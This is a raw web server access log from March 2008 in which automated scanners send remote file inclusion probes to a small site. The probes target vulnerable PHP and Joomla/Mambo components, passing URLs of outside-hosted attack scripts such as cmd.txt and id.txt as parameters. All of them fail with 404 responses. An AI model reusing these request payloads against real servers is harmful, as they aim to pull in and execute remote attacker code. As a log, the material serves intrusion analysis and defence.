87.106.9.138 - - [02/Mar/2008:07:07:36 -0800] "GET /logs/access_080119.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.ministryofentrepreneurship.com/media/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.227.60.6 - - [02/Mar/2008:07:08:00 -0800] "GET /logs//mcf.php?content=http://rafb.net/p/oQh6dE84.txt? HTTP/1.1" 404 275 "-" "Links (2.1pre17; Linux 2.6.11-gentoo-r8 i686; 80x24)" "www.dmulk.com"
212.227.60.6 - - [02/Mar/2008:07:08:00 -0800] "GET //mcf.php?content=http://rafb.net/p/oQh6dE84.txt? HTTP/1.1" 404 275 "-" "Links (2.1pre17; Linux 2.6.11-gentoo-r8 i686; 80x24)" "www.dmulk.com"
212.227.60.6 - - [02/Mar/2008:07:08:01 -0800] "GET /logs/access_080215.log//mcf.php?content=http://rafb.net/p/oQh6dE84.txt? HTTP/1.1" 404 275 "-" "Links (2.1pre17; Linux 2.6.11-gentoo-r8 i686; 80x24)" "www.dmulk.com"
208.16.236.69 - - [02/Mar/2008:07:08:27 -0800] "GET /logs/access.log/index.php?pagina1=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.16.236.69 - - [02/Mar/2008:07:08:27 -0800] "GET /logs/index.php?pagina1=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.16.236.69 - - [02/Mar/2008:07:08:32 -0800] "GET /logs/access_080131.log/index.php?pagina1=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.195.58.182 - - [02/Mar/2008:07:08:51 -0800] "GET /logs/access_080118.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
213.198.27.34 - - [02/Mar/2008:07:09:59 -0800] "GET /logs/access_080216.log/main.php?x=http://www.visitesantacatarina.com.br/banner/safeon.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
213.198.27.34 - - [02/Mar/2008:07:10:00 -0800] "GET /main.php?x=http://www.visitesantacatarina.com.br/banner/safeon.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
213.198.27.34 - - [02/Mar/2008:07:10:00 -0800] "GET /logs/main.php?x=http://www.visitesantacatarina.com.br/banner/safeon.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
193.138.206.219 - - [02/Mar/2008:07:10:04 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.leakdoctor.co.kr/shop/pro/off.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
193.138.206.219 - - [02/Mar/2008:07:10:04 -0800] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.leakdoctor.co.kr/shop/pro/off.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
72.30.214.234 - - [02/Mar/2008:07:10:16 -0800] "GET /logs/access_080122.log HTTP/1.0" 200 590794 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
193.138.206.219 - - [02/Mar/2008:07:10:37 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.leakdoctor.co.kr/shop/pro/off.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
213.198.27.34 - - [02/Mar/2008:07:10:37 -0800] "GET /index.php?pageurl=http://www.visitesantacatarina.com.br/banner/safeon.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
193.138.206.219 - - [02/Mar/2008:07:10:37 -0800] "GET //skin/zero_vote/error.php?dir=http://www.leakdoctor.co.kr/shop/pro/off.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
196.35.158.180 - - [02/Mar/2008:07:11:19 -0800] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
196.35.158.180 - - [02/Mar/2008:07:11:28 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.218.85.18 - - [02/Mar/2008:07:11:32 -0800] "GET /logs/access.log/index.php?pageurl=http://www.visitesantacatarina.com.br/banner/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [02/Mar/2008:07:11:33 -0800] "GET /index.php?pageurl=http://www.visitesantacatarina.com.br/banner/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [02/Mar/2008:07:11:34 -0800] "GET /logs/index.php?pageurl=http://www.visitesantacatarina.com.br/banner/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.197.68.66 - - [02/Mar/2008:07:12:02 -0800] "GET /logs/access_080208.log/index.php?body=http://www.techbomb.com/fastmicrowave/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.197.68.66 - - [02/Mar/2008:07:12:02 -0800] "GET /index.php?body=http://www.techbomb.com/fastmicrowave/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.197.68.66 - - [02/Mar/2008:07:12:03 -0800] "GET /logs/index.php?body=http://www.techbomb.com/fastmicrowave/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
65.98.14.194 - - [02/Mar/2008:07:12:15 -0800] "GET ///phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://www.janroe.net/c.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.109.192.16 - - [02/Mar/2008:07:12:24 -0800] "GET /logs/access_080117.log/index.php?body=http://www.clubwizard.co.uk/link_tracker/rlz/scheck.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
193.138.206.219 - - [02/Mar/2008:07:12:27 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.leakdoctor.co.kr/shop/pro/off.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
193.138.206.219 - - [02/Mar/2008:07:12:28 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.leakdoctor.co.kr/shop/pro/off.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
85.214.121.92 - - [02/Mar/2008:07:12:54 -0800] "GET //components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://top-articles.net/admin/backup/cmd.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.117.225.155 - - [02/Mar/2008:07:13:20 -0800] "GET /claroline/tracking/userLog.php?rootSys=http://www.grupslactancia.info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.218.85.18 - - [02/Mar/2008:07:13:24 -0800] "GET /index.php?pageurl=http://www.visitesantacatarina.com.br/banner/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.89.137.99 - - [02/Mar/2008:07:13:41 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.89.137.99 - - [02/Mar/2008:07:13:42 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [02/Mar/2008:07:14:24 -0800] "GET /logs/access_080101.log/index.php?pageurl=http://www.visitesantacatarina.com.br/banner/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.60.6 - - [02/Mar/2008:07:14:45 -0800] "GET /logs/access.log//mcf.php?content=http://rafb.net/p/oQh6dE84.txt? HTTP/1.1" 404 275 "-" "Links (2.1pre17; Linux 2.6.11-gentoo-r8 i686; 80x24)" "www.dmulk.com"
74.6.23.143 - - [02/Mar/2008:07:15:32 -0800] "GET /bikes/dteel/2008_02_07/?D=A HTTP/1.0" 200 2521 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
194.126.239.14 - - [02/Mar/2008:07:15:35 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.117.237.134 - - [02/Mar/2008:07:16:55 -0800] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.fansvictorvaldes.es//images/data/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.105.35.14 - - [02/Mar/2008:07:18:43 -0800] "GET /logs//administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.contactoefectivo.com/mambots/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.105.35.14 - - [02/Mar/2008:07:18:43 -0800] "GET //administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.contactoefectivo.com/mambots/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.93.148.36 - - [02/Mar/2008:07:18:50 -0800] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://hellinsoloradio.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
69.93.148.36 - - [02/Mar/2008:07:18:50 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://hellinsoloradio.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
208.16.236.69 - - [02/Mar/2008:07:18:52 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
196.35.158.180 - - [02/Mar/2008:07:18:57 -0800] "GET /logs/access_080122.log//components/com_simpleboard/image_upload.php?sbp=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
196.35.158.180 - - [02/Mar/2008:07:19:01 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
196.35.158.181 - - [02/Mar/2008:07:19:09 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.16.236.69 - - [02/Mar/2008:07:19:24 -0800] "GET //modules/TotalCalendar/about.php?inc_dir=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.15.225.39 - - [02/Mar/2008:07:19:32 -0800] "GET //components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://www.explosivedjs.com/music/cmd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
194.29.164.6 - - [02/Mar/2008:07:19:33 -0800] "GET /index.php3?pag=http://h.b-warez.com/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.229.45.126 - - [02/Mar/2008:07:19:51 -0800] "GET /vhttp://users.volja.net/xmass/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
87.229.45.126 - - [02/Mar/2008:07:19:51 -0800] "GET /logs/vhttp://users.volja.net/xmass/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
77.232.66.107 - - [02/Mar/2008:07:19:52 -0800] "GET /logs//import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://theninjalegion.com/etc/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
77.232.66.107 - - [02/Mar/2008:07:19:52 -0800] "GET //import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://theninjalegion.com/etc/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
67.19.192.212 - - [02/Mar/2008:07:19:56 -0800] "GET //administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://203.71.212.3/www/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.223.100.182 - - [02/Mar/2008:07:21:23 -0800] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://horseshoebendarkansas.net/blog/nucleus/libs/include/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.223.100.182 - - [02/Mar/2008:07:21:24 -0800] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://horseshoebendarkansas.net/blog/nucleus/libs/include/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.223.100.182 - - [02/Mar/2008:07:21:24 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://horseshoebendarkansas.net/blog/nucleus/libs/include/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.227.60.6 - - [02/Mar/2008:07:22:03 -0800] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://rafb.net/p/oQh6dE84.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
212.227.60.6 - - [02/Mar/2008:07:22:03 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://rafb.net/p/oQh6dE84.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
66.135.60.191 - - [02/Mar/2008:07:22:03 -0800] "GET /administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://www.schuleniederwil.ch/images/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.60.6 - - [02/Mar/2008:07:22:12 -0800] "GET /logs/access_080124.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://rafb.net/p/oQh6dE84.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
208.16.236.69 - - [02/Mar/2008:07:22:32 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.60.6 - - [02/Mar/2008:07:22:37 -0800] "GET /logs/access_080208.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://rafb.net/p/oQh6dE84.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
69.89.21.88 - - [02/Mar/2008:07:26:12 -0800] "GET /logs/administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://www.schuleniederwil.ch/images/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.89.21.88 - - [02/Mar/2008:07:26:12 -0800] "GET /administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://www.schuleniederwil.ch/images/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.212.164.34 - - [02/Mar/2008:07:26:33 -0800] "GET /logs/access_071225.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://usuarios.lycos.es/arquivos/cmdAsc.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.212.164.34 - - [02/Mar/2008:07:26:33 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://usuarios.lycos.es/arquivos/cmdAsc.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.212.164.34 - - [02/Mar/2008:07:26:33 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://usuarios.lycos.es/arquivos/cmdAsc.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.212.164.34 - - [02/Mar/2008:07:26:36 -0800] "GET /logs/access_071220.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://usuarios.lycos.es/arquivos/cmdAsc.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.117.225.155 - - [02/Mar/2008:07:26:58 -0800] "GET /claroline/tracking/userLog.php?rootSys=http://www.grupslactancia.info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.35.39.129 - - [02/Mar/2008:07:27:12 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://kgny.us/files/ec.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
77.232.66.107 - - [02/Mar/2008:07:27:19 -0800] "GET /logs//index.php?mosConfig_absolute_path=http://theninjalegion.com/etc/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
77.232.66.107 - - [02/Mar/2008:07:27:19 -0800] "GET //index.php?mosConfig_absolute_path=http://theninjalegion.com/etc/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
217.197.68.66 - - [02/Mar/2008:07:27:44 -0800] "GET /logs/access_080131.log/index.php?body=http://www.techbomb.com/fastmicrowave/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.20.168 - - [02/Mar/2008:07:27:50 -0800] "GET /funny/?M=D HTTP/1.0" 200 792 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
194.29.164.6 - - [02/Mar/2008:07:29:41 -0800] "GET /logs/access_080119.log/index.php3?pag=http://h.b-warez.com/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.29.164.6 - - [02/Mar/2008:07:29:42 -0800] "GET /logs/index.php3?pag=http://h.b-warez.com/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.195.7.19 - - [02/Mar/2008:07:29:49 -0800] "GET /logs/access_080122.log/errors.php?error=http://www.rockhardnails.com/catalog/includes/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.195.7.19 - - [02/Mar/2008:07:29:50 -0800] "GET /errors.php?error=http://www.rockhardnails.com/catalog/includes/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.195.7.19 - - [02/Mar/2008:07:29:50 -0800] "GET /logs/errors.php?error=http://www.rockhardnails.com/catalog/includes/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
206.71.183.50 - - [02/Mar/2008:07:30:18 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.192.212 - - [02/Mar/2008:07:30:19 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://203.71.212.3/www/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.16.236.69 - - [02/Mar/2008:07:30:32 -0800] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.16.236.69 - - [02/Mar/2008:07:30:32 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.117.225.155 - - [02/Mar/2008:07:30:39 -0800] "GET /logs/access_080201.log/claroline/tracking/userLog.php?rootSys=http://www.grupslactancia.info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.117.225.155 - - [02/Mar/2008:07:30:39 -0800] "GET /logs/claroline/tracking/userLog.php?rootSys=http://www.grupslactancia.info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.36.169.130 - - [02/Mar/2008:07:31:30 -0800] "GET /logs/access_080131.log/index.php?pagina=http://servicesbrazil.net/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.36.169.130 - - [02/Mar/2008:07:31:31 -0800] "GET /index.php?pagina=http://servicesbrazil.net/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.36.169.130 - - [02/Mar/2008:07:31:31 -0800] "GET /logs/index.php?pagina=http://servicesbrazil.net/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.218.85.18 - - [02/Mar/2008:07:31:31 -0800] "GET /logs/access_080216.log/main.php?x=http://www.visitesantacatarina.com.br/banner/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [02/Mar/2008:07:31:32 -0800] "GET /main.php?x=http://www.visitesantacatarina.com.br/banner/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.16.236.69 - - [02/Mar/2008:07:32:00 -0800] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.16.236.69 - - [02/Mar/2008:07:32:00 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.232.66.107 - - [02/Mar/2008:07:32:54 -0800] "GET /http://myportals.de//css/style.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
77.232.66.107 - - [02/Mar/2008:07:32:54 -0800] "GET /logs/http://myportals.de//css/style.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
67.19.192.212 - - [02/Mar/2008:07:33:15 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://203.71.212.3/www/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.192.212 - - [02/Mar/2008:07:33:15 -0800] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://203.71.212.3/www/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
211.23.52.162 - - [02/Mar/2008:07:33:15 -0800] "GET /logs/access_080131.log//index.php?sayfa=http://216.191.16.13/.tmp/site/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.23.52.162 - - [02/Mar/2008:07:33:16 -0800] "GET //index.php?sayfa=http://216.191.16.13/.tmp/site/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.23.52.162 - - [02/Mar/2008:07:33:18 -0800] "GET /logs//index.php?sayfa=http://216.191.16.13/.tmp/site/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
41.207.177.167 - - [02/Mar/2008:07:33:32 -0800] "GET /logs/access_080211.log/index.php?mosConfig_absolute_path=http://216.191.16.13/.tmp/site/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
41.207.177.167 - - [02/Mar/2008:07:33:33 -0800] "GET /index.php?mosConfig_absolute_path=http://216.191.16.13/.tmp/site/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
41.207.177.167 - - [02/Mar/2008:07:33:33 -0800] "GET /logs/index.php?mosConfig_absolute_path=http://216.191.16.13/.tmp/site/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.61.196.190 - - [02/Mar/2008:07:34:20 -0800] "GET /logs/access_071216.log/protection.php?action=logout&siteurl=http://www.grupslactancia.info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.61.196.190 - - [02/Mar/2008:07:34:23 -0800] "GET /protection.php?action=logout&siteurl=http://www.grupslactancia.info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.61.196.190 - - [02/Mar/2008:07:34:27 -0800] "GET /logs/protection.php?action=logout&siteurl=http://www.grupslactancia.info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.61.196.190 - - [02/Mar/2008:07:34:30 -0800] "GET /logs/access_080120.log/protection.php?action=logout&siteurl=http://www.grupslactancia.info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.192.212 - - [02/Mar/2008:07:35:34 -0800] "GET //classes/adodbt/sql.php?classes_dir=http://203.71.212.3/www/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.117.237.134 - - [02/Mar/2008:07:36:04 -0800] "GET /logs/access_080131.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.fansvictorvaldes.es//images/data/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.117.237.134 - - [02/Mar/2008:07:36:04 -0800] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.fansvictorvaldes.es//images/data/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.29.89.114 - - [02/Mar/2008:07:36:35 -0800] "GET /config.inc.php?path_escape=http://shadowstargames.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
72.29.89.114 - - [02/Mar/2008:07:36:35 -0800] "GET /logs/config.inc.php?path_escape=http://shadowstargames.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
208.16.236.69 - - [02/Mar/2008:07:37:19 -0800] "GET /logs/access_080121.log//modules/TotalCalendar/about.php?inc_dir=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.16.236.69 - - [02/Mar/2008:07:37:19 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
